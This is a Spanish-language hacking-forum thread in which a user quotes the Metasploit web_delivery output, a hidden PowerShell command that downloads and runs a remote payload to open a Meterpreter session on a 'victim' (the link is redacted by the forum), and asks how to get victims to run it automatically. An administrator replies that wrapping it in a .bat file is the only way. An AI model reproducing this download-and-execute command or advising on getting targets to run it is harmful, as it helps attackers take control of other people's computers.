comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Web_delivery

  • 1 Respuestas
  • 791 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado RxB

  • *
  • Underc0der
  • Mensajes: 20
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Octubre 17, 2015, 05:34:01 pm »
Hola,

Estuve viendo algunos tutoriales sobre el script de Metasploit web_delivery.
Luego de lanzar el exploit, queda a la escucha:
msf exploit(web_delivery) > exploit

msf exploit(web_delivery) >
powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('No tienes permisos para ver links. Registrate o Entra con tu cuenta'))

Estuve viendo que del lado de la victima hay que ejecutar el siguiente código para iniciar una sesión de meterpreter:

powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('No tienes permisos para ver links. Registrate o Entra con tu cuenta'))

Ví que lo hacen vía CMD. También probé con un archivo .BAT y funcionó.

Mi duda es si hay alguna forma automática para que se ejecute el código. Ya que es muy díficil que la victima copie el código y lo ejecute en CMD, no?

Si alguien tiene alguna idea se lo agradezco!
« Última modificación: Octubre 22, 2015, 05:19:36 pm por Expermicid »

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5380
  • Actividad:
    76.67%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #1 en: Octubre 23, 2015, 09:13:52 am »
@No tienes permisos para ver links. Registrate o Entra con tu cuenta, efectivamente la unica forma que puede funcionarte es con un .bat
Dudo que haya otra forma de hacerlo.

Saludos!
ANTRAX


 

¿Te gustó el post? COMPARTILO!